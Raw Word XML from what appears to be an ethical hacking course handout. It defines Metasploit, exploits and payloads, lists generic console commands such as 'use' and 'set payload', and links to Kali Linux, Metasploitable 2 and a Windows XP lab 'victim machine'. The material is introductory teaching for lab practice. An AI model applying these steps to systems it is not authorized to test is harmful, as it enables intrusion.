    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Metasploit?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit is a powerful open-source penetration testing framework used to find, exploit, and validate vulnerabilities in systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What are exploits in Metasploit? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits in Metasploit are modules that take advantage of vulnerabilities to execute malicious code on a target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What are payloads in Metasploit?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads are the code delivered by an exploit that performs a specific task, such as opening a reverse shell or adding a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What are the commands used to carry out an exploit?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common commands include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use [exploit_path]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 [option] [value]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 options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 payload [payload]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exploit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Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">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Kali Linux - Hacker Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.kali.org/get-kali/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">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Metasploitable 2 - Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sourceforge.net/projects/metasploitable</w:t>
        </w:r>
      </w:hyperlink>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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Windows XP Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://drive.google.com/drive/folders/16lKVVJxEVBbIIu1AspjglaZ1bLh7yZMe?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>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22"/>
      <w:tblW w:w="9576.0" w:type="dxa"/>
      <w:jc w:val="left"/>
      <w:tblInd w:w="-115.0" w:type="dxa"/>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both"/>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Ethical Hacking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Metasploit</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0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%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i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00" w:lineRule="auto"/>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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8">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9">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0">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1">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2">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3">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4">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5">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6">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7">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8">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9">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0">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1">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drive.google.com/drive/folders/16lKVVJxEVBbIIu1AspjglaZ1bLh7yZMe?usp=sharin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kali.org/get-kali/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploitab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